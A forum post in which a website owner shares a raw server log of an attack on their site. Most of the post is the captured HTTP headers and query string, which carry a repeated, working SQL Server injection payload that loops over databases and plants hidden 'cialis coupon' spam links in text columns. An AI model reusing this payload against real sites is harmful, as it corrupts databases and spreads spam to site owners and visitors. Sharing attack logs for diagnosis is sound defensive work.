Appreciate the responses. I guess I'm not the only one, which makes me feel a lot better. I wonder whether this situation will get better or worse over time. It seems ridiculous to me.
FWIW, here is a report on one of the attacks from yesterday (one of thousands). I have no idea what this means, but I'm just throwing it out there. I do see "cialis" in the query string, so I'm assuming it's an attempted server hijack for mass spam emailing.
HTTP_ACCEPT:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 HTTP_ACCEPT_ENCODING:gzip,deflate,gzip, deflate HTTP_HOST:xxxxxxxx.com HTTP_REFERER:
http://google.com;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b-- HTTP_USER_AGENT:Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into 
@w;end;close @b--
ALL_RAW Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,gzip, deflate Host: xxxxxxxx.com Referer:
http://google.com;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b-- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into 
@w;end;close @b--
QUERY_STRING minprice=&maxprice=&bedrrom=&sqft=;declare%20@b%20cursor;declare%20@s%20varchar (8000);declare%20@w%20varchar(99);set%20@b=cursor% 20for%20select%20DB_NAME()%20union%20select%20name %20from%20sys.databases%20where%20(has_dbaccess(na me)!=0)%20and%20name%20not%20in%20('master','tempd b','model','msdb',DB_NAME());open%20@b;fetch%20nex t%20from%20@b%20into%20@w;while%20@@FETCH_STATUS=0 %20begin%20set%20@s='begin%20try%20use%20'%2B@w%2B ';declare%20@c%20cursor;declare%20@d%20varchar(400 0);set%20@c=cursor%20for%20select%20''update%20%5B ''%2BTABLE_NAME%2B''%5D%20set%20%5B''%2BCOLUMN_NAM E%2B''%5D=%5B''%2BCOLUMN_NAME%2B''%5D%2Bcase%20ABS (CHECKSUM(NewId()))%2510%20when%200%20then%20''''' '%2Bchar(60)%2B''div%20style=%22display:none%22''% 2Bchar(62)%2B''cialis%20coupon%20''%2Bchar(60)%2B' 'a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''www .cartoninjas.net''%2Bchar(47)%2B''page''%2Bchar(47 )%2B''Drug-Prescription-Card%22%20rel=%22nofollow%22''%2Bchar(62)%2B'''''' %2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20 then%20''''cialis%20coupon''''%20when%201%20then%2 0''''cialis%20coupon''''%20else%20''''cialis%20cou pon''''%20end%20%2B''''''%2Bchar(60)%2Bchar(47)%2B ''a''%2Bchar(62)%2B''%20cialis%20coupon''%2Bchar(6 0)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''''%20else %20''''''''%20end''%20FROM%20sysindexes%20AS%20i%2 0INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o. id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20O N%20o.NAME=TABLE_NAME%20WHERE(indid%20in%20(0,1))% 20and%20DATA_TYPE%20like%20''%25varchar''%20and(CH ARACTER_MAXIMUM_LENGTH%20in%20(2147483647,-1));open%20@c;fetch%20next%20from%20@c%20into%20@d ;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fe tch%20next%20from%20@c%20into%20@d;end;close%20@c% 20end%20try%20begin%20catch%20end%20catch';exec%20 (@s);fetch%20next%20from%20@b%20into%20@w;end;clos e%20@b--&city=
HTTP_REFERER
http://google.com;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--
HTTP_USER_AGENT Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--